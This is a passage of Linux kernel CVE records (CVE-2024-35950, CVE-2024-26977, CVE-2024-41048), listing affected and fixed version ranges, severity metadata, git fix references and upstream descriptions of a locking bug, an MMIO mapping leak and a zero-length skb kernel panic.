              "versionType": "git"
            },
            {
              "lessThan": "d2dc6600d4e3e1453e3b1fb233e9f97e2a1ae949",
              "status": "affected",
              "version": "e13a058310509b22b2b45cbdd82d8797e173c3db",
              "versionType": "git"
            },
            {
              "lessThan": "18c8cc6680ce938d0458859b6a08b4d34f7d8055",
              "status": "affected",
              "version": "e13a058310509b22b2b45cbdd82d8797e173c3db",
              "versionType": "git"
            },
            {
              "lessThan": "04e018bd913d3d3336ab7d21c2ad31a9175fe984",
              "status": "affected",
              "version": "e13a058310509b22b2b45cbdd82d8797e173c3db",
              "versionType": "git"
            },
            {
              "lessThan": "8ceb873d816786a7c8058f50d903574aff8d3764",
              "status": "affected",
              "version": "e13a058310509b22b2b45cbdd82d8797e173c3db",
              "versionType": "git"
            },
            {
              "lessThan": "3eadd887dbac1df8f25f701e5d404d1b90fd0fea",
              "status": "affected",
              "version": "e13a058310509b22b2b45cbdd82d8797e173c3db",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/drm_client_modeset.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.14"
            },
            {
              "lessThan": "4.14",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.156",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.87",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.28",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.156",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.87",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.28",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.7",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/client: Fully protect modes[] with dev-\u003emode_config.mutex\n\nThe modes[] array contains pointers to modes on the connectors\u0027\nmode lists, which are protected by dev-\u003emode_config.mutex.\nThus we need to extend modes[] the same protection or by the\ntime we use it the elements may already be pointing to\nfreed/reused memory."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:36:07.144Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/5a2f957e3c4553bbb100504a1acfeaeb33f4ca4e"
        },
        {
          "url": "https://git.kernel.org/stable/c/41586487769eede64ab1aa6c65c74cbf76c12ef0"
        },
        {
          "url": "https://git.kernel.org/stable/c/d2dc6600d4e3e1453e3b1fb233e9f97e2a1ae949"
        },
        {
          "url": "https://git.kernel.org/stable/c/18c8cc6680ce938d0458859b6a08b4d34f7d8055"
        },
        {
          "url": "https://git.kernel.org/stable/c/04e018bd913d3d3336ab7d21c2ad31a9175fe984"
        },
        {
          "url": "https://git.kernel.org/stable/c/8ceb873d816786a7c8058f50d903574aff8d3764"
        },
        {
          "url": "https://git.kernel.org/stable/c/3eadd887dbac1df8f25f701e5d404d1b90fd0fea"
        }
      ],
      "title": "drm/client: Fully protect modes[] with dev-\u003emode_config.mutex",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35950",
    "datePublished": "2024-05-20T09:41:45.333Z",
    "dateReserved": "2024-05-17T13:50:33.134Z",
    "dateUpdated": "2026-01-05T10:36:07.144Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26977 (GCVE-0-2024-26977)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:20 – Updated: 2025-05-04 09:01

Title

pci_iounmap(): Fix MMIO mapping leak

Summary

In the Linux kernel, the following vulnerability has been resolved: pci_iounmap(): Fix MMIO mapping leak The #ifdef ARCH_HAS_GENERIC_IOPORT_MAP accidentally also guards iounmap(), which means MMIO mappings are leaked. Move the guard so we call iounmap() for MMIO mappings.

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/5e4b23e7a7b33a1e5…
	https://git.kernel.org/stable/c/6d21d0356aa44157a…
	https://git.kernel.org/stable/c/b5d40f02e7222da03…
	https://git.kernel.org/stable/c/f3749345a9b7295dd…
	https://git.kernel.org/stable/c/af280e137e273935f…
	https://git.kernel.org/stable/c/7626913652cc786c2…

Impacted products

Vendor

Product

Version

Linux

Affected: 316e8d79a0959c302b0c462ab64b069599f10eef , < 5e4b23e7a7b33a1e56bfa3e5598138a2234d55b6 (git)
Affected: 316e8d79a0959c302b0c462ab64b069599f10eef , < 6d21d0356aa44157a62e39c0d1a13d4c69a8d0c8 (git)
Affected: 316e8d79a0959c302b0c462ab64b069599f10eef , < b5d40f02e7222da032c2042aebcf2a07de9b342f (git)
Affected: 316e8d79a0959c302b0c462ab64b069599f10eef , < f3749345a9b7295dd071d0ed589634cb46364f77 (git)
Affected: 316e8d79a0959c302b0c462ab64b069599f10eef , < af280e137e273935f2e09f4d73169998298792ed (git)
Affected: 316e8d79a0959c302b0c462ab64b069599f10eef , < 7626913652cc786c238e2dd7d8740b17d41b2637 (git)

Linux

Affected: 5.15
Unaffected: 0 , < 5.15 (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-26977",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-18T18:26:41.016262Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-31T15:16:36.636Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.898Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5e4b23e7a7b33a1e56bfa3e5598138a2234d55b6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6d21d0356aa44157a62e39c0d1a13d4c69a8d0c8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b5d40f02e7222da032c2042aebcf2a07de9b342f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f3749345a9b7295dd071d0ed589634cb46364f77"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/af280e137e273935f2e09f4d73169998298792ed"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7626913652cc786c238e2dd7d8740b17d41b2637"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "lib/pci_iomap.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5e4b23e7a7b33a1e56bfa3e5598138a2234d55b6",
              "status": "affected",
              "version": "316e8d79a0959c302b0c462ab64b069599f10eef",
              "versionType": "git"
            },
            {
              "lessThan": "6d21d0356aa44157a62e39c0d1a13d4c69a8d0c8",
              "status": "affected",
              "version": "316e8d79a0959c302b0c462ab64b069599f10eef",
              "versionType": "git"
            },
            {
              "lessThan": "b5d40f02e7222da032c2042aebcf2a07de9b342f",
              "status": "affected",
              "version": "316e8d79a0959c302b0c462ab64b069599f10eef",
              "versionType": "git"
            },
            {
              "lessThan": "f3749345a9b7295dd071d0ed589634cb46364f77",
              "status": "affected",
              "version": "316e8d79a0959c302b0c462ab64b069599f10eef",
              "versionType": "git"
            },
            {
              "lessThan": "af280e137e273935f2e09f4d73169998298792ed",
              "status": "affected",
              "version": "316e8d79a0959c302b0c462ab64b069599f10eef",
              "versionType": "git"
            },
            {
              "lessThan": "7626913652cc786c238e2dd7d8740b17d41b2637",
              "status": "affected",
              "version": "316e8d79a0959c302b0c462ab64b069599f10eef",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "lib/pci_iomap.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.15"
            },
            {
              "lessThan": "5.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\npci_iounmap(): Fix MMIO mapping leak\n\nThe #ifdef ARCH_HAS_GENERIC_IOPORT_MAP accidentally also guards iounmap(),\nwhich means MMIO mappings are leaked.\n\nMove the guard so we call iounmap() for MMIO mappings."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:01:19.979Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/5e4b23e7a7b33a1e56bfa3e5598138a2234d55b6"
        },
        {
          "url": "https://git.kernel.org/stable/c/6d21d0356aa44157a62e39c0d1a13d4c69a8d0c8"
        },
        {
          "url": "https://git.kernel.org/stable/c/b5d40f02e7222da032c2042aebcf2a07de9b342f"
        },
        {
          "url": "https://git.kernel.org/stable/c/f3749345a9b7295dd071d0ed589634cb46364f77"
        },
        {
          "url": "https://git.kernel.org/stable/c/af280e137e273935f2e09f4d73169998298792ed"
        },
        {
          "url": "https://git.kernel.org/stable/c/7626913652cc786c238e2dd7d8740b17d41b2637"
        }
      ],
      "title": "pci_iounmap(): Fix MMIO mapping leak",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26977",
    "datePublished": "2024-05-01T05:20:28.830Z",
    "dateReserved": "2024-02-19T14:20:24.203Z",
    "dateUpdated": "2025-05-04T09:01:19.979Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-41048 (GCVE-0-2024-41048)

Vulnerability from cvelistv5 – Published: 2024-07-29 14:32 – Updated: 2025-11-03 21:59

Title

skmsg: Skip zero length skb in sk_msg_recvmsg

Summary

In the Linux kernel, the following vulnerability has been resolved: skmsg: Skip zero length skb in sk_msg_recvmsg When running BPF selftests (./test_progs -t sockmap_basic) on a Loongarch platform, the following kernel panic occurs: [...] Oops[#1]: CPU: 22 PID: 2824 Comm: test_progs Tainted: G OE 6.10.0-rc2+ #18 Hardware name: LOONGSON Dabieshan/Loongson-TC542F0, BIOS Loongson-UDK2018 ... ... ra: 90000000048bf6c0 sk_msg_recvmsg+0x120/0x560 ERA: 9000000004162774 copy_page_to_iter+0x74/0x1c0 CRMD: 000000b0 (PLV0 -IE -DA +PG DACF=CC DACM=CC -WE) PRMD: 0000000c (PPLV0 +PIE +PWE) EUEN: 00000007 (+FPE +SXE +ASXE -BTE) ECFG: 00071c1d (LIE=0,2-4,10-12 VS=7) ESTAT: 00010000 [PIL] (IS= ECode=1 EsubCode=0) BADV: 0000000000000040 PRID: 0014c011 (Loongson-64bit, Loongson-3C5000) Modules linked in: bpf_testmod(OE) xt_CHECKSUM xt_MASQUERADE xt_conntrack Process test_progs (pid: 2824, threadinfo=0000000000863a31, task=...) Stack : ... Call Trace: [<9000000004162774>] copy_page_to_iter+0x74/0x1c0 [<90000000048bf6c0>] sk_msg_recvmsg+0x120/0x560 [<90000000049f2b90>] tcp_bpf_recvmsg_parser+0x170/0x4e0 [<90000000049aae34>] inet_recvmsg+0x54/0x100 [<900000000481ad5c>] sock_recvmsg+0x7c/0xe0 [<900000000481e1a8>] __sys_recvfrom+0x108/0x1c0 [<900000000481e27c>] sys_recvfrom+0x1c/0x40 [<9000000004c076ec>] do_syscall+0x8c/0xc0 [<9000000003731da4>] handle_syscall+0xc4/0x160 Code: ... ---[ end trace 0000000000000000 ]--- Kernel panic - not syncing: Fatal exception Kernel relocated by 0x3510000 .text @ 0x9000000003710000 .data @ 0x9000000004d70000 .bss @ 0x9000000006469400 ---[ end Kernel panic - not syncing: Fatal exception ]--- [...] This crash happens every time when running sockmap_skb_verdict_shutdown subtest in sockmap_basic. This crash is because a NULL pointer is passed to page_address() in the sk_msg_recvmsg(). Due to the different implementations depending on the architecture, page_address(NULL) will trigger a panic on Loongarch platform but not on x86 platform. So this bug was hidden on x86 platform for a while, but now it is exposed on Loongarch platform. The root cause is that a zero length skb (skb->len == 0) was put on the queue. This zero length skb is a TCP FIN packet, which was sent by shutdown(), invoked in test_sockmap_skb_verdict_shutdown(): shutdown(p1, SHUT_WR); In this case, in sk_psock_skb_ingress_enqueue(), num_sge is zero, and no page is put to this sge (see sg_set_page in sg_set_page), but this empty sge is queued into ingress_msg list. And in sk_msg_recvmsg(), this empty sge is used, and a NULL page is got by sg_page(sge). Pass this NULL page to copy_page_to_iter(), which passes it to kmap_local_page() and to page_address(), then kernel panics. To solve this, we should skip this zero length skb. So in sk_msg_recvmsg(), if copy is zero, that means it's a zero length skb, skip invoking copy_page_to_iter(). We are using the EFAULT return triggered by copy_page_to_iter to check for is_fin in tcp_bpf.c.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/195b7bcdfc5adc5b2…
	https://git.kernel.org/stable/c/fb61d7b9fb6ef0032…
	https://git.kernel.org/stable/c/b180739b45a38b4ca…
	https://git.kernel.org/stable/c/f8bd689f37f4198a4…
	https://git.kernel.org/stable/c/f0c18025693707ec3…

Impacted products

Vendor

Product

Version

Linux

Affected: 604326b41a6fb9b4a78b6179335decee0365cd8c , < 195b7bcdfc5adc5b2468f279dd9eb7eebd2e7632 (git)
Affected: 604326b41a6fb9b4a78b6179335decee0365cd8c , < fb61d7b9fb6ef0032de469499a54dab4c7260d0d (git)
Affected: 604326b41a6fb9b4a78b6179335decee0365cd8c , < b180739b45a38b4caa88fe16bb5273072e6613dc (git)
Affected: 604326b41a6fb9b4a78b6179335decee0365cd8c , < f8bd689f37f4198a4c61c4684f591ba639595b97 (git)
Affected: 604326b41a6fb9b4a78b6179335decee0365cd8c , < f0c18025693707ec344a70b6887f7450bf4c826b (git)

Linux

Affected: 4.20
Unaffected: 0 , < 4.20 (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.100 , ≤ 6.1.* (semver)
Unaffected: 6.6.41 , ≤ 6.6.* (semver)
Unaffected: 6.9.10 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:59:48.428Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/195b7bcdfc5adc5b2468f279dd9eb7eebd2e7632"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fb61d7b9fb6ef0032de469499a54dab4c7260d0d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b180739b45a38b4caa88fe16bb5273072e6613dc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f8bd689f37f4198a4c61c4684f591ba639595b97"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f0c18025693707ec344a70b6887f7450bf4c826b"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41048",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:22:50.876207Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:02.036Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/core/skmsg.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "195b7bcdfc5adc5b2468f279dd9eb7eebd2e7632",
              "status": "affected",
              "version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
              "versionType": "git"
            },
            {
              "lessThan": "fb61d7b9fb6ef0032de469499a54dab4c7260d0d",
              "status": "affected",
              "version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
              "versionType": "git"
            },
            {
              "lessThan": "b180739b45a38b4caa88fe16bb5273072e6613dc",
              "status": "affected",
              "version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
              "versionType": "git"
            },
            {
              "lessThan": "f8bd689f37f4198a4c61c4684f591ba639595b97",
              "status": "affected",
              "version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
              "versionType": "git"
            },
            {
              "lessThan": "f0c18025693707ec344a70b6887f7450bf4c826b",
              "status": "affected",
              "version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/core/skmsg.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.20"
            },
            {
              "lessThan": "4.20",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.100",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.41",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.100",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.41",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.10",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nskmsg: Skip zero length skb in sk_msg_recvmsg\n\nWhen running BPF selftests (./test_progs -t sockmap_basic) on a Loongarch\nplatform, the following kernel panic occurs:\n\n  [...]\n  Oops[#1]:\n  CPU: 22 PID: 2824 Comm: test_progs Tainted: G           OE  6.10.0-rc2+ #18\n  Hardware name: LOONGSON Dabieshan/Loongson-TC542F0, BIOS Loongson-UDK2018\n     ... ...\n     ra: 90000000048bf6c0 sk_msg_recvmsg+0x120/0x560\n    ERA: 9000000004162774 copy_page_to_iter+0x74/0x1c0\n   CRMD: 000000b0 (PLV0 -IE -DA +PG DACF=CC DACM=CC -WE)\n   PRMD: 0000000c (PPLV0 +PIE +PWE)\n   EUEN: 00000007 (+FPE +SXE +ASXE -BTE)\n   ECFG: 00071c1d (LIE=0,2-4,10-12 VS=7)\n  ESTAT: 00010000 [PIL] (IS= ECode=1 EsubCode=0)\n   BADV: 0000000000000040\n   PRID: 0014c011 (Loongson-64bit, Loongson-3C5000)\n  Modules linked in: bpf_testmod(OE) xt_CHECKSUM xt_MASQUERADE xt_conntrack\n  Process test_progs (pid: 2824, threadinfo=0000000000863a31, task=...)\n  Stack : ...\n  Call Trace:\n  [\u003c9000000004162774\u003e] copy_page_to_iter+0x74/0x1c0\n  [\u003c90000000048bf6c0\u003e] sk_msg_recvmsg+0x120/0x560\n  [\u003c90000000049f2b90\u003e] tcp_bpf_recvmsg_parser+0x170/0x4e0\n  [\u003c90000000049aae34\u003e] inet_recvmsg+0x54/0x100\n  [\u003c900000000481ad5c\u003e] sock_recvmsg+0x7c/0xe0\n  [\u003c900000000481e1a8\u003e] __sys_recvfrom+0x108/0x1c0\n  [\u003c900000000481e27c\u003e] sys_recvfrom+0x1c/0x40\n  [\u003c9000000004c076ec\u003e] do_syscall+0x8c/0xc0\n  [\u003c9000000003731da4\u003e] handle_syscall+0xc4/0x160\n  Code: ...\n  ---[ end trace 0000000000000000 ]---\n  Kernel panic - not syncing: Fatal exception\n  Kernel relocated by 0x3510000\n   .text @ 0x9000000003710000\n   .data @ 0x9000000004d70000\n   .bss  @ 0x9000000006469400\n  ---[ end Kernel panic - not syncing: Fatal exception ]---\n  [...]\n\nThis crash happens every time when running sockmap_skb_verdict_shutdown\nsubtest in sockmap_basic.\n\nThis crash is because a NULL pointer is passed to page_address() in the\nsk_msg_recvmsg(). Due to the different implementations depending on the\narchitecture, page_address(NULL) will trigger a panic on Loongarch\nplatform but not on x86 platform. So this bug was hidden on x86 platform\nfor a while, but now it is exposed on Loongarch platform. The root cause\nis that a zero length skb (skb-\u003elen == 0) was put on the queue.\n\nThis zero length skb is a TCP FIN packet, which was sent by shutdown(),\ninvoked in test_sockmap_skb_verdict_shutdown():\n\n\tshutdown(p1, SHUT_WR);\n\nIn this case, in sk_psock_skb_ingress_enqueue(), num_sge is zero, and no\npage is put to this sge (see sg_set_page in sg_set_page), but this empty\nsge is queued into ingress_msg list.\n\nAnd in sk_msg_recvmsg(), this empty sge is used, and a NULL page is got by\nsg_page(sge). Pass this NULL page to copy_page_to_iter(), which passes it\nto kmap_local_page() and to page_address(), then kernel panics.\n\nTo solve this, we should skip this zero length skb. So in sk_msg_recvmsg(),\nif copy is zero, that means it\u0027s a zero length skb, skip invoking\ncopy_page_to_iter(). We are using the EFAULT return triggered by\ncopy_page_to_iter to check for is_fin in tcp_bpf.c."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:20:54.907Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/195b7bcdfc5adc5b2468f279dd9eb7eebd2e7632"
        },
        {
          "url": "https://git.kernel.org/stable/c/fb61d7b9fb6ef0032de469499a54dab4c7260d0d"
        },
        {
          "url": "https://git.kernel.org/stable/c/b180739b45a38b4caa88fe16bb5273072e6613dc"
        },
        {
          "url": "https://git.kernel.org/stable/c/f8bd689f37f4198a4c61c4684f591ba639595b97"
        },
        {
          "url": "https://git.kernel.org/stable/c/f0c18025693707ec344a70b6887f7450bf4c826b"
        }
      ],
      "title": "skmsg: Skip zero length skb in sk_msg_recvmsg",
      "x_generator": {
        "engine": "bippy-1.2.0"
